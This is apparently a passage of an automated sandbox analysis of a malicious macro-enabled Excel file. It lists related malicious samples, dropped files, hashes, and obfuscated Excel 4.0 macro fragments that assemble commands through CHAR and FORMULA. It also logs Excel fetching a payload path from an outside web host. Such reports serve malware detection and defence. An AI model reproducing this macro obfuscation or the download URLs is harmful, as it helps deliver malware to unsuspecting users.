                    PaCJ39hC4R.xlsxGet hashmaliciousBrowse
                    • 107.180.46.229
                    part-1500645108.xlsbGet hashmaliciousBrowse
                    • 107.180.46.229
                    invoice template 33142738819.docxGet hashmaliciousBrowse
                    • 107.180.46.229
                    item-40567503.xlsbGet hashmaliciousBrowse
                    • 107.180.46.229
                    FILE_464863409880121918.xlsmGet hashmaliciousBrowse
                    • 107.180.46.229
                    item-107262298.xlsbGet hashmaliciousBrowse
                    • 107.180.46.229
                    item-1202816963.xlsbGet hashmaliciousBrowse
                    • 107.180.46.229
                    counter-119221000.xlsGet hashmaliciousBrowse
                    • 107.180.46.229
                    box-1688169224.xlsbGet hashmaliciousBrowse
                    • 107.180.46.229
                    box-1689035414.xlsbGet hashmaliciousBrowse
                    • 107.180.46.229
                    survey-1805824485.xlsGet hashmaliciousBrowse
                    • 107.180.46.229
                    box-1235955987.xlsbGet hashmaliciousBrowse
                    • 107.180.46.229
                    tr.xlsGet hashmaliciousBrowse
                    • 107.180.46.229
                    counter-1389180325.xlsGet hashmaliciousBrowse
                    • 107.180.46.229
                    Purchase Order.ppaGet hashmaliciousBrowse
                    • 107.180.46.229

                    Dropped Files

                    No context

                    Created / dropped Files

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\GSCXBEVV.htm
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                    Category:downloaded
                    Size (bytes):174739
                    Entropy (8bit):5.2177771329382745
                    Encrypted:false
                    SSDEEP:3072:Ey/WQHnjZZ++99ffmmWWdmblJwNFmbxikGHSllanRYGUqcVudlxMu:Ey/WQHnjZZ++99ffmmWWdmbldbxs
                    MD5:8390656A9CE7D214386AE81EA0B89D32
                    SHA1:B2B0D4E1F626E16601C3F58EC95109A06312AEF7
                    SHA-256:AC7541E64DD6B4FAF9E12E8DB314AFB68F2E35B8ADBE0EA87C2B5B2D879240A0
                    SHA-512:95FC9DFAE57FD87B252DF9973955BB4DC3EDEB7048BA2B51C12C519F4BB31F223C0A3603F73B0A5558F352817726F89E8CEFC97C49AC1BC8D00A1122A8D00A3B
                    Malicious:false
                    Reputation:low
                    IE Cache URL:https://vendes.marketing/
                    Preview: <!DOCTYPE html>.<html lang="es">.<head>..<meta charset="UTF-8">..<meta name="viewport" content="width=device-width, initial-scale=1.0, viewport-fit=cover" />..<title>Agencia #1 de Marketing Digital en M.xico y La Mejor de LatinoAm.rica | Vendes.Marketing</title>.<meta name="dc.title" content="Agencia #1 de Marketing Digital en M.xico y La Mejor de LatinoAm.rica | Vendes.Marketing" />.<meta name="dc.description" content="La mejor agencia de especialistas en estrategias de marketing digital con enfoque en aumentar tus ventas r.pido. Asesor.a y acompa.amiento de profesionales para conseguir m.s clientes. Obt.n tu revisi.n de marketing digital GRATIS ahora!" />.<meta name="dc.relation" content="https://vendes.marketing/" />.<meta name="dc.source" content="https://vendes.marketing/" />.<meta name="dc.language" content="es_ES" />.<meta name="description" content="La mejor agencia de especialistas en estrategias de marketing digital con enfoque en aumentar tus ventas r.pido. Asesor
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2FADF20A.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 1714 x 241, 8-bit colormap, non-interlaced
                    Category:dropped
                    Size (bytes):14200
                    Entropy (8bit):7.855440184003825
                    Encrypted:false
                    SSDEEP:384:aeN0UV6iAmjeSvWFL3SdwHEpS4Q24kc49+Tb:jmUxjfC30+kS4Qyob
                    MD5:4FE798EE522800691796BC9446918C90
                    SHA1:1E01CDE49D0B1B5E2F0DFBAD568DC2ECFBEDEAD3
                    SHA-256:EC0BC049D3D30C29567806EB2D555589CD2E1B6B30E9145F77B73A32EC1C1087
                    SHA-512:FF968DA2D921DA198E93E82E2FB15583CFA4696455755A6674BC321CD90AE5502ADDC445A0F8C630D9DC780E77EEC6FFC83F55CD2C16DDE7F465BFD0D89BF1AA
                    Malicious:false
                    Reputation:low
                    Preview: .PNG........IHDR..............-......sRGB.........gAMA......a.....PLTE....6...6.....6..a..a..6......a.....a...aa....6....6...66666.6aa..a..6aaa...a....66.....aaaa..aaaa6a....a....66...6.a.....S.b.....6.:...b....f....S.....t:...6t...f..........:6...S:6.:bS......fbS..Sf.t.....:.t..t....bS..tfb..6.f...Sfb.......:.S.....6l...WtRNS........................................................................................c5.....pHYs..........o.d..5.IDATx^.....q....R.A...[.l...'@. .....G..'..;...%..]U]3s....x.s.;.]]..W...............................................................................................................................................~..|....../~...?.{...~fe./...).H....Og1.6g....1T+v..'"h.._(Z;.Zh.bo.....rip..5.>..).h..(F....Z.[.q2B.WZz,...M}@..n$.dO.VK?......YZ...."-o#.K..q..-#5.JT1.K.H..]se.M+.!...R..m{..Q#lO..^ev.R:...0.>.....\....=.>.Op.<..p....qN.Vfq,..\F..6.1..+.. .J....c.4?.Jx...u..X+.E.D...Ko.}...s..G..8I.v...8'B....y..).
                    C:\Users\user\AppData\Local\Temp\CBD7.tmp
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Composite Document File V2 Document, Cannot read section info
                    Category:dropped
                    Size (bytes):1536
                    Entropy (8bit):1.1464700112623651
                    Encrypted:false
                    SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                    MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                    SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                    SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                    SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\AppData\Local\Temp\~DFDF944FEFD380A8E6.TMP
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):512
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3::
                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                    Malicious:false
                    Reputation:high, very likely benign file
                    Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    C:\Users\user\Desktop\~$SCAN_7295943480515097.xlsm
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):165
                    Entropy (8bit):1.4377382811115937
                    Encrypted:false
                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                    MD5:797869BB881CFBCDAC2064F92B26E46F
                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    C:\Users\user\besta.ocx
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                    Category:dropped
                    Size (bytes):174739
                    Entropy (8bit):5.2177771329382745
                    Encrypted:false
                    SSDEEP:3072:Ey/WQHnjZZ++99ffmmWWdmblJwNFmbxikGHSllanRYGUqcVudlxMu:Ey/WQHnjZZ++99ffmmWWdmbldbxs
                    MD5:8390656A9CE7D214386AE81EA0B89D32
                    SHA1:B2B0D4E1F626E16601C3F58EC95109A06312AEF7
                    SHA-256:AC7541E64DD6B4FAF9E12E8DB314AFB68F2E35B8ADBE0EA87C2B5B2D879240A0
                    SHA-512:95FC9DFAE57FD87B252DF9973955BB4DC3EDEB7048BA2B51C12C519F4BB31F223C0A3603F73B0A5558F352817726F89E8CEFC97C49AC1BC8D00A1122A8D00A3B
                    Malicious:false
                    Preview: <!DOCTYPE html>.<html lang="es">.<head>..<meta charset="UTF-8">..<meta name="viewport" content="width=device-width, initial-scale=1.0, viewport-fit=cover" />..<title>Agencia #1 de Marketing Digital en M.xico y La Mejor de LatinoAm.rica | Vendes.Marketing</title>.<meta name="dc.title" content="Agencia #1 de Marketing Digital en M.xico y La Mejor de LatinoAm.rica | Vendes.Marketing" />.<meta name="dc.description" content="La mejor agencia de especialistas en estrategias de marketing digital con enfoque en aumentar tus ventas r.pido. Asesor.a y acompa.amiento de profesionales para conseguir m.s clientes. Obt.n tu revisi.n de marketing digital GRATIS ahora!" />.<meta name="dc.relation" content="https://vendes.marketing/" />.<meta name="dc.source" content="https://vendes.marketing/" />.<meta name="dc.language" content="es_ES" />.<meta name="description" content="La mejor agencia de especialistas en estrategias de marketing digital con enfoque en aumentar tus ventas r.pido. Asesor

                    Static File Info

                    General

                    File type:Microsoft Excel 2007+
                    Entropy (8bit):7.624498524713085
                    TrID:
                    • Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52%
                    • Excel Microsoft Office Open XML Format document (40004/1) 40.40%
                    • ZIP compressed archive (8000/1) 8.08%
                    File name:SCAN_7295943480515097.xlsm
                    File size:38040
                    MD5:1ab11dce30326f39f6186f9aa05d5777
                    SHA1:397dd88ca9d78a16ab549a8d22a711ddbea80c05
                    SHA256:8f8e07b2eaca8af62e86cebd2372f1b85d420091801ec472796387a44a98bbcd
                    SHA512:388f99c4621c31b2a696fa271b71a7ac0424bd1114054ee1cf19d20883a25b31184b07b7bc31eb016876fc4163b4b3ac21298c2c5cb9d1edb9e0560da32f9cd5
                    SSDEEP:768:a/I83XfjrjevZCwVItvxmUxjfC30+kS4QyoO0VIqwgb:anrIItvxXYk4pTVIqR
                    File Content Preview:PK..........!.L#li............[Content_Types].xml ...(.........................................................................................................................................................................................................

                    File Icon

                    Icon Hash:e4e2aa8aa4bcbcac

                    Static OLE Info

                    General

                    Document Type:OpenXML
                    Number of OLE Files:1

                    OLE File "SCAN_7295943480515097.xlsm"

                    Indicators

                    Has Summary Info:
                    Application Name:
                    Encrypted Document:
                    Contains Word Document Stream:
                    Contains Workbook/Book Stream:
                    Contains PowerPoint Document Stream:
                    Contains Visio Document Stream:
                    Contains ObjectPool Stream:
                    Flash Objects Count:
                    Contains VBA Macros:

                    Macro 4.0 Code

                    4,7,=CHAR('Ss1'!E45)
11,1,o

                    1,5,L
11,1,=CHAR('Ss1'!N43)

                    2,0,r
10,4,=CHAR('Ss1'!D39)

                    1,8,C
12,3,=CHAR('Ss1'!S46)

                    1,3,=FORMULA()=FORMULA()=FORMULA('Buk1'!E11,'Buk2'!B12)=FORMULA('Buk2'!H5,'Buk3'!H3)=FORMULA('Buk3'!C9,'Buk4'!C2)=FORMULA('Buk4'!I8,'Buk5'!F2)=FORMULA('Buk5'!B12,'Buk6'!B10)=FORMULA('Buk6'!G3,'Buk7'!I2)=FORMULA('Buk7'!D13,'Buk1'!A3)=FORMULA('Buk3'!H3&'Ss1'!O6&'Ss1'!D16&'Ss1'!K13&'Ss1'!R12&'Ss1'!R14,D3)=FORMULA('Buk3'!H3&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!B9,D17)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!R11&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!L5&'Ss1'!R14,D19)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA1"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!R11&'Buk7'!I2&'Buk4'!C2&'Buk5'!F2&'Buk5'!F2&Ss1br2!B3&'Buk1'!A3&Ss1br2!D5&'Buk6'!B10&Ss1br2!G3&'Buk7'!I2&'Buk7'!I2&Ss1br2!O9&'Ss1'!R14,D21)=FORMULA('Buk3'!H3&'Ss1'!H21&'Ss1'!G23&'Ss1'!R12&"SASA2"&'Ss1'!R9&'Ss1'!I8&'Ss1'!R7&'Ss1'!M20&'Ss1'!K23&'Ss1'!N24&'Ss1'!P18&'Ss1'!K18&'Ss1'!R12&'Ss1'!I8&'Ss1'!R14&'Ss1'!R7&'Ss1'!R14,D23)=FORMULA('Buk3'!H3&'Ss1'!J7&'Ss1'!N15&'Ss1'!J7&'Ss1'!M20&'Ss1'!R12&'Ss1'!R16&Ss1br2!Q3&Ss1br2!K10&Ss1br2!I1&'Ss1'!R11&'Ss1'!R5&'Ss1'!R5&'Ss1'!R3&'Ss1'!P2&'Ss1'!O1&'Ss1'!O9&'Ss1'!N5&'Ss1'!F3&'Ss1'!R5&'Ss1'!B9&'Ss1'!I12&'Ss1'!K8&'Ss1'!R7&'Ss1'!R16&'Ss1'!R18&"LKLW"&'Ss1'!R14,D25)=FORMULA('Buk3'!H3&'Ss1'!K54&'Ss1'!K56&'Ss1'!J58&'Ss1'!M52&'Ss1'!K54&'Ss1'!M61&'Ss1'!R12&'Ss1'!R14,D32)

                    2,7,=
8,2,=CHAR('Ss1'!G40)

                    1,2,A
7,8,=CHAR('Ss1'!J39)

                    2,6,=CHAR('Ss1'!R41)
9,1,e

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Dec 2, 2021 10:16:25.921377897 CET4916780192.168.2.22162.240.9.126
                    Dec 2, 2021 10:16:28.918908119 CET4916780192.168.2.22162.240.9.126
                    Dec 2, 2021 10:16:34.925416946 CET4916780192.168.2.22162.240.9.126
                    Dec 2, 2021 10:16:46.992574930 CET4916880192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:47.102866888 CET8049168107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:47.103055000 CET4916880192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:47.103739977 CET4916880192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:47.213901997 CET8049168107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:48.280706882 CET8049168107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:48.280869007 CET4916880192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:48.296308041 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:48.296360016 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:48.296442032 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:48.313359976 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:48.313386917 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:48.661170959 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:48.661364079 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:48.674010992 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:48.674035072 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:48.674536943 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:48.674635887 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:48.939470053 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:48.980933905 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:50.875811100 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:50.875874996 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:50.876058102 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:50.876101971 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:50.876123905 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:50.876198053 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:50.876857042 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:50.876986980 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:50.877006054 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:50.877093077 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:50.986254930 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:50.986430883 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:50.986541033 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:50.986587048 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:50.986651897 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:50.986670017 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:50.986696005 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:50.987050056 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:50.987143993 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:50.987159967 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:50.987231016 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:50.988826036 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.096740961 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.096899986 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.096976995 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.097023964 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.097047091 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.097107887 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.097194910 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.550908089 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.550939083 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.551115990 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.551125050 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.551146030 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.551186085 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.551211119 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.551215887 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.551261902 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.551266909 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.551290035 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.551357031 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.551369905 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.551438093 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.551444054 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.551476002 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.551490068 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.551495075 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.551510096 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.551529884 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.551564932 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.551659107 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.551808119 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.551873922 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.551879883 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.551918983 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.552406073 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.661087036 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.661328077 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.661344051 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.661423922 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.661478043 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.661554098 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.661561966 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.661616087 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.661716938 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.661798954 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.661806107 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.661868095 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.663719893 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.912161112 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.912183046 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.912307978 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.912364006 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.912381887 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.912391901 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.912435055 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.912444115 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.912450075 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.912484884 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.912533045 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.912539005 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.912628889 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.913475037 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.915544033 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.915644884 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.915658951 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.915697098 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.915719032 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.915771008 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.915776014 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.915802002 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.915807962 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.915816069 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.915847063 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.915858030 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:51.915889978 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:51.916937113 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:52.022408962 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:52.022516966 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:52.022567034 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:52.022648096 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:52.022670984 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:52.022690058 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:52.022703886 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:52.022728920 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:52.022737026 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:52.022768021 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:52.022839069 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:52.028908014 CET49169443192.168.2.22107.180.46.229
                    Dec 2, 2021 10:16:52.028928995 CET44349169107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:53.284095049 CET8049168107.180.46.229192.168.2.22
                    Dec 2, 2021 10:16:53.284338951 CET4916880192.168.2.22107.180.46.229
                    Dec 2, 2021 10:18:25.790323973 CET4916880192.168.2.22107.180.46.229
                    Dec 2, 2021 10:18:26.288666010 CET4916880192.168.2.22107.180.46.229
                    Dec 2, 2021 10:18:26.897182941 CET4916880192.168.2.22107.180.46.229
                    Dec 2, 2021 10:18:28.098434925 CET4916880192.168.2.22107.180.46.229
                    Dec 2, 2021 10:18:30.500931025 CET4916880192.168.2.22107.180.46.229
                    Dec 2, 2021 10:18:35.306246996 CET4916880192.168.2.22107.180.46.229
                    Dec 2, 2021 10:18:44.916677952 CET4916880192.168.2.22107.180.46.229

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Dec 2, 2021 10:16:25.889705896 CET5216753192.168.2.228.8.8.8
                    Dec 2, 2021 10:16:25.909921885 CET53521678.8.8.8192.168.2.22
                    Dec 2, 2021 10:16:46.970187902 CET5059153192.168.2.228.8.8.8
                    Dec 2, 2021 10:16:46.990058899 CET53505918.8.8.8192.168.2.22

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                    Dec 2, 2021 10:16:25.889705896 CET192.168.2.228.8.8.80x899dStandard query (0)standoutglobal.comA (IP address)IN (0x0001)
                    Dec 2, 2021 10:16:46.970187902 CET192.168.2.228.8.8.80xae29Standard query (0)vendes.marketingA (IP address)IN (0x0001)

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                    Dec 2, 2021 10:16:25.909921885 CET8.8.8.8192.168.2.220x899dNo error (0)standoutglobal.com162.240.9.126A (IP address)IN (0x0001)
                    Dec 2, 2021 10:16:46.990058899 CET8.8.8.8192.168.2.220xae29No error (0)vendes.marketing107.180.46.229A (IP address)IN (0x0001)

                    HTTP Request Dependency Graph

                    • vendes.marketing

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.2249169107.180.46.229443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    TimestampkBytes transferredDirectionData


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    1192.168.2.2249168107.180.46.22980C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    TimestampkBytes transferredDirectionData
                    Dec 2, 2021 10:16:47.103739977 CET1OUTGET /transmigrant/Wplzr/ HTTP/1.1
                    Accept: */*
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: vendes.marketing
                    Connection: Keep-Alive
                    Dec 2, 2021 10:16:48.280706882 CET1INHTTP/1.1 301 Moved Permanently
                    Date: Thu, 02 Dec 2021 09:16:47 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.3.30
                    Link: <https://vendes.marketing/wp-json/>; rel="https://api.w.org/"
                    Expires: Thu, 02 Dec 2021 10:16:48 GMT
                    Cache-Control: max-age=3600
                    X-Redirect-By: WordPress
                    Upgrade: h2,h2c
                    Connection: Upgrade, Keep-Alive
                    Location: https://vendes.marketing
                    Content-Length: 0
                    Keep-Alive: timeout=5
                    Content-Type: text/html; charset=UTF-8


                    HTTPS Proxied Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.2249169107.180.46.229443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    TimestampkBytes transferredDirectionData
                    2021-12-02 09:16:48 UTC0OUTGET / HTTP/1.1
                    Accept: */*
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
